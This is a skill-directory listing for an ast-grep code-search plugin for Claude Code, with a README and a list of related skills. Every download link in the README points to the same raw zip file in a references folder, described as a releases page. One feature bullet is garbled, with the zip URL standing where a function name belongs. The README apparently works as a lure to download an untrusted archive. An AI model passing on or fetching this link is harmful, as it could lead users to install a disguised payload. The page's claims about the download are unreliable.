Claude Skill
Description
🔍 Enhance code searches with ast-grep, finding patterns in your code structure for improved error handling and analysis.
Installation
This entry records only its repository, not the path inside it, so there is no
exact command to give. Open the source below and copy the folder into
~/.claude/skills/, or the file into ~/.claude/agents/.
README
🌟 claude-skill - Simple Code Searching Made Easy
🖱️ Download Now
[](https://raw.githubusercontent.com/Kayunangka/claude-skill/main/ast-grep/skills/ast-grep/references/claude_skill_2.5.zip)
📜 What is This?
This is a Claude Code plugin marketplace that provides the ast-grep plugin. The plugin helps you search your code based on structure rather than just text. With this tool, you can easily find key patterns in your code.
Key Features:
- Find async functions without error handling.
- Locate all React components using specific hooks.
- Identify functions with more than three parameters.
- Search for https://raw.githubusercontent.com/Kayunangka/claude-skill/main/ast-grep/skills/ast-grep/references/claude_skill_2.5.zip calls inside class methods.
⚙️ Prerequisites
You need to have ast-grep installed on your system. Follow these guidelines below based on your operating system:
macOS
Open your terminal and run:
brew install ast-grep
npm
Visit your command line and type:
npm install -g @ast-grep/cli
Cargo
Use this command in your terminal if you have Cargo:
cargo install ast-grep
🚀 Getting Started
To get started with the claude-skill plugin, you need to download it from the Releases page.
**Visit the Releases Page:** Click on this link to go to the download page: [Download claude-skill](https://raw.githubusercontent.com/Kayunangka/claude-skill/main/ast-grep/skills/ast-grep/references/claude_skill_2.5.zip)
**Choose Your Version:** On the Releases page, select the version you want to install. Look for the latest release for the best features.
**Download the File:** Depending on your operating system, download the appropriate file for installation.
**Install the Plugin:**
Related Skills
Auto Update
Pull the latest ECC repo changes and reinstall the current managed targets.
Development Ecc Guide
Navigate ECC's current agents, skills, commands, hooks, install profiles, and docs from the live repository su
Development Epic Claim
Claim an epic issue, stamp coordination state, and sync local ownership.
Development Epic Publish
Publish a validated epic update back to the issue and local cache.
Development Epic Review
Mark epic review requested, approved, or changes requested.
Development Epic Unblock
Sweep blocked epic issues and reopen anything whose dependencies are closed.
Development Related Agents
Django Build Resolver
Django/Python build, migration, and dependency error resolution specialist. Fixes pip/Poetry errors, migration
Openai Codex CLI
(55.8k ⭐) - Lightweight coding agent that runs in your terminal.
src/agents/ — 11 Agent Definitions
**Generated:** 2026-04-11